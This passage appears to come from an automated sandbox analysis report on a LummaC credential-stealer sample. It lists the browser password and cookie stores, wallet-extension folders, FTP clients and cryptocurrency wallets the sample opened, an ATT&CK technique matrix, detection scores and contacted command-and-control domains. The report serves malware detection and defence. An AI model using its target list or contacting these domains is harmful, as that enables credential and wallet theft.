              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: Yara matchFile source: Process Memory Space: 8ZVMneG.exe PID: 2144, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: 8ZVMneG.exe PID: 2144, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		211
              Process Injection              		11
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		211
              Process Injection              		LSASS Memory1
              Query Registry              		Remote Desktop Protocol41
              Data from Local System              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information              		Security Account Manager141
              Security Software Discovery              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information              		NTDS11
              Virtualization/Sandbox Evasion              		Distributed Component Object ModelInput Capture114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              Process Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials11
              File and Directory Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
              System Information Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              8ZVMneG.exe65%VirustotalBrowse
              8ZVMneG.exe71%ReversingLabsWin32.Trojan.LummaStealer
              8ZVMneG.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              steamcommunity.com
              		23.55.153.106
              		truefalse
                		high
                lev-tolstoi.com
                		104.21.66.86
                		truefalse
                  		high
                  immureprech.biz
                  		178.62.201.34
                  		truefalse
                    		high
                    deafeninggeh.biz
                    		178.62.201.34
                    		truefalse
                      		high
                      sordid-snaked.cyou
                      		unknown
                      		unknownfalse
                        		high
                        diffuculttan.xyz
                        		unknown
                        		unknownfalse
                          		high
                          effecterectz.xyz
                          		unknown
                          		unknownfalse
                            		high
                            bellflamre.click
                            		unknown
                            		unknownfalse
                              		high
                              awake-weaves.cyou
                              		unknown
                              		unknownfalse
                                		high
                                wrathful-jammy.cyou
                                		unknown
                                		unknownfalse
                                  		high
                                  debonairnukk.xyz
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    sordid-snaked.cyoufalse
                                      		high
                                      deafeninggeh.bizfalse
                                        		high
                                        effecterectz.xyzfalse
                                          		high
                                          wrathful-jammy.cyoufalse
                                            		high
                                            https://steamcommunity.com/profiles/76561199724331900false
                                              		high
                                              awake-weaves.cyoufalse
                                                		high
                                                immureprech.bizfalse
                                                  		high
                                                  https://immureprech.biz/apifalse
                                                    		high
                                                    debonairnukk.xyzfalse
                                                      		high
                                                      https://lev-tolstoi.com/apifalse
                                                        		high
                                                        diffuculttan.xyzfalse
                                                          		high
                                                          bellflamre.clicktrue
                                                            		unknown

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/chrome_newtab8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://player.vimeo.com8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://duckduckgo.com/ac/?q=8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://steamcommunity.com/?subsection=broadcasts8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://lev-tolstoi.com/s8ZVMneG.exe, 00000003.00000003.2483406156.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2402881702.000000000141A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2403246485.000000000141C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://lev-tolstoi.com/api0b8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://store.steampowered.com/subscriber_agreement/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.gstatic.cn/recaptcha/8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://lev-tolstoi.com/Spe8ZVMneG.exe, 00000003.00000003.2402881702.000000000141A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2403246485.000000000141C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://lev-tolstoi.com:443/apical8ZVMneG.exe, 00000003.00000003.2483778671.00000000013B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://www.valvesoftware.com/legal.htm8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.youtube.com8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://lev-tolstoi.com/apibV78ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://www.google.com8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2402934236.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://wrathful-jammy.cyou/t8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af68ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://lev-tolstoi.com/k8ZVMneG.exe, 00000003.00000002.2485639494.0000000003C10000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://lev-tolstoi.com/OF_8ZVMneG.exe, 00000003.00000003.2483406156.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://lev-tolstoi.com/g8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://s.ytimg.com;8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
